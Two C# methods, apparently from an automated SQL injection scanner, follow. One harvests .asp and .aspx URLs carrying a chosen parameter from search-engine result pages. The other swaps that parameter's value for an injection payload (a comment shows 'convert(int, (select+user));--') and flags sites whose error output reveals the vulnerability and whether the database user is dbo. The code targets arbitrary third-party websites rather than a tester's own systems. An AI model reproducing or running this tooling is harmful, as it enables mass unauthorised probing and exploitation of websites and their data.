예제 #1
0
        public void search()
        {
            for (int nIndex = nIndexStart; nIndex <= nIndexEnd; nIndex++)
            {
                string sUrl = oFrmMain.getSearchUrlList()[nIndex];

                // Replace param to vulnerable parameter -> convert(int, (select+user));--
                int    nPos        = sUrl.IndexOf(oFrmMain.getSearchEngineParam() + "=");
                string sParamValue = sUrl.Substring(nPos + oFrmMain.getSearchEngineParam().Length + 1);

                sUrl = sUrl.Replace("=" + sParamValue, "=" + Global.GLOBAL_PARAM_SEARCH_ENGINE_VULN_VALUE);

                CustomWebClient oWebClient = new CustomWebClient(nTimeout);
                string          sHtmlResult;
                try {
                    sHtmlResult = oWebClient.DownloadString(sUrl);
                } catch (WebException oWebException)  {
                    try {
                        StreamReader oStreamReader = new StreamReader(((HttpWebResponse)oWebException.Response).GetResponseStream());
                        sHtmlResult = oStreamReader.ReadToEnd();
                    } catch (Exception) { sHtmlResult = String.Empty; }
                }

                if (sHtmlResult.ToLower().Contains(Global.GLOBAL_RESPONSE_SEARCH_ENGINE_VULN_SENTENCE.ToLower()))
                {
                    Boolean bIsDboUser;

                    if (sHtmlResult.ToLower().Contains(Global.GLOBAL_RESPONSE_SEARCH_ENGINE_VULN_DBO_USER))
                    {
                        bIsDboUser = true;
                    }
                    else
                    {
                        bIsDboUser = false;
                    }

                    oFrmMain.refreshVulnResults(sUrl, bIsDboUser);
                }

                oWebClient = null;

                oFrmMain.refreshVulnProgressBar();
            }
        }
예제 #2
0
        private void searchUrls(int nPageNumber)
        {
            int nSeed = ((nPageNumber * 10) + 1);

            CustomWebClient oWebClient = new CustomWebClient(nTimeout);
            string          sHtmlResult;

            try {
                sHtmlResult = oWebClient.DownloadString(oFrmMain.getSearchEngineUrl() + nSeed.ToString());
            } catch (WebException oWebException)  {
                try {
                    StreamReader oStreamReader = new StreamReader(((HttpWebResponse)oWebException.Response).GetResponseStream());
                    sHtmlResult = oStreamReader.ReadToEnd();
                } catch (Exception) { sHtmlResult = String.Empty; }
            }
            oWebClient = null;

            // Search 10 results
            for (int i = 0; i < 10; i++)
            {
                // Find a valid link
                string sLink = "link-" + (i + 1);

                if (sHtmlResult.Contains(sLink))
                {
                    string sHtmlResultLink = sHtmlResult.Substring(sHtmlResult.IndexOf(sLink));

                    int nPosLinkHrefStart  = sHtmlResultLink.IndexOf("href=\"") + 6;
                    int nPosLinkHrefLength = sHtmlResultLink.Substring(nPosLinkHrefStart).IndexOf("\"");

                    string sUrl = sHtmlResultLink.Substring(nPosLinkHrefStart, nPosLinkHrefLength);

                    // Check if url is valid
                    string sParamToSearch;
                    if (oFrmMain.getTxtSearchEngineParam().Length > 0)
                    {
                        sParamToSearch = oFrmMain.getTxtSearchEngineParam();
                    }
                    else
                    {
                        sParamToSearch = Global.GLOBAL_PARAM_SEARCH_ENGINE_SEARCH_DEFAULT_VALUE_1;
                    }

                    string sPage;
                    if (oFrmMain.getRbSearchEnginePages1IsChecked())
                    {
                        sPage = ".asp?";
                    }
                    else
                    {
                        sPage = ".aspx?";
                    }

                    if (sUrl.ToLower().Contains(sPage + sParamToSearch.ToLower() + "="))
                    {
                        oFrmMain.refreshSearchURLResults(sUrl);
                    }
                }

                oFrmMain.refreshSearchURLProgressBar();
            }
        }